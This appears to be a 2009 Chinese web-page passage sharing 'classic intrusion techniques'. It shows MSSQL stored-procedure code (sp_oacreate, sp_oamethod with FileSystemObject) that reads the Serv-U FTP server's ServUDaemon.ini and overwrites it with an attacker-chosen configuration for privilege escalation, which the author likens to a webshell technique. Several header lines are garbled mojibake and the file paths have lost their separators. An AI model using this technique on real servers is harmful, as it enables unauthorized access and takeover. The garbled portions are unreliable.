几个用过的经典入侵技巧整理
2009-06-15 16:54:51 来源:WEB开发网 闂傚倷绶氬ḿ褍螞閹绢喖绠柨鐕傛嫹
闂傚倷绀侀幉锟犲垂閻㈠灚宕查柟鎵閸庡秵銇勯幒鎴濃偓鐢稿磻閹炬枼妲堟繛鍡楃С濞岊亞绱撻崒姘扁枌闁瑰嚖鎷�
婵犵數濮幏鍐川椤撴繄鎹曢梻渚€娼уú銈吤洪妸鈺佺劦妞ゆ帊鑳堕埊鏇㈡煏閸モ晛浠х紒杈╁仱閺佹捇鏁撻敓锟�闂傚倷绶氬ḿ褍螞閹绢喖绠柨鐕傛嫹 闂傚倷鑳舵灙缂佺粯顨呴埢宥夊即閵忕姵鐎梺缁樺姇閹碱偆鐥閺屾洘绻濊箛鏇犵獥闂佺厧澹婃禍婊堚€旈崘顏佸亾閿濆骸澧ù鐘欏嫮绠鹃柛顐ゅ枎閻忋儲銇勯弴妯哄姦妞ゃ垺鐟╅幃鈩冩償閵囧府鎷�
核心提示: exec @ret = sp_oamethod @f, ’readline’, @line outwhile( @ret = 0 )beginprint @lineexec @ret = sp_oamethod @f, ’readline’,
exec @ret = sp_oamethod @f, ’readline’, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, ’readline’, @line out
end
★
这段代码的意思是通过使用存储过程来读取d:Serv-U6.3ServUDaemon.ini里的配置信息,返回执行成功 如图2
图片看不清楚?请点击这里查看原图(大图)。
既然可以读了 那么我们是不是可以写一个进去?继续执行
★
declare @o int, @f int, @t int, @ret int
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’createtextfile’, @f out, ’d:Serv-U6.3ServUDaemon.ini’, 1
exec @ret = sp_oamethod @f, ’writeline’, NULL, 《这里添写自己写好的SU配置信息,刚才复制的那些都要写上去,在最后添加我们自己的,跟我们在WEBSHELL里的serv-u提权是一样的》
★
按F5,执行一下,发现命令执行成功,马上使用上面的语句复查一下,发现已经写进去了,如图3。
图3
图片看不清楚?请点击这里查看原图(大图)。
中查找“几个用过的经典入侵技巧整理”更多相关内容
中查找“几个用过的经典入侵技巧整理”更多相关内容更多精彩
赞助商链接
